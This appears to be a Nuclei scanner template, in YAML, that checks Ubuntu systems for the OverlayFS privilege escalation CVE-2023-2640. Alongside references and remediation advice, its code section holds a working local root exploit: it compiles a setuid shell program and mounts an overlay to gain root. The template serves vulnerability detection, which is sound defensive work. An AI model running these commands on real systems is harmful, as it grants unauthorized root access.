58 lines
2.6 KiB
YAML
58 lines
2.6 KiB
YAML
id: CVE-2023-2640
|
|
|
|
info:
|
|
name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
|
|
author: princechaddha
|
|
severity: high
|
|
description: |
|
|
A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
|
|
impact: |
|
|
An attacker with local access can gain elevated privileges on the affected system.
|
|
remediation: |
|
|
Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
|
|
- https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
|
|
- https://ubuntu.com/security/notices/USN-6250-1
|
|
- https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.8
|
|
cve-id: CVE-2023-2640
|
|
cwe-id: CWE-863
|
|
epss-score: 0.00232
|
|
epss-percentile: 0.60636
|
|
cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: canonical
|
|
product: ubuntu_linux
|
|
shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux"
|
|
tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical
|
|
|
|
self-contained: true
|
|
code:
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
id
|
|
|
|
- engine:
|
|
- sh
|
|
- bash
|
|
source: |
|
|
cd /tmp
|
|
echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
|
|
gcc test.c -o test
|
|
unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- '!contains(code_1_response, "(root)")'
|
|
- 'contains(code_2_response, "(root)")'
|
|
condition: and
|
|
# digest: 490a004630440220115656a336b2d20b4c44fe1ade030de40d947cf0fd7fb8f8a5a910dca2ab200602205ead45f6f081b3555a7924050cd922e13d30139e64254790b1368627d59b4389:922c64590222798bb761d5b6d8e72950 |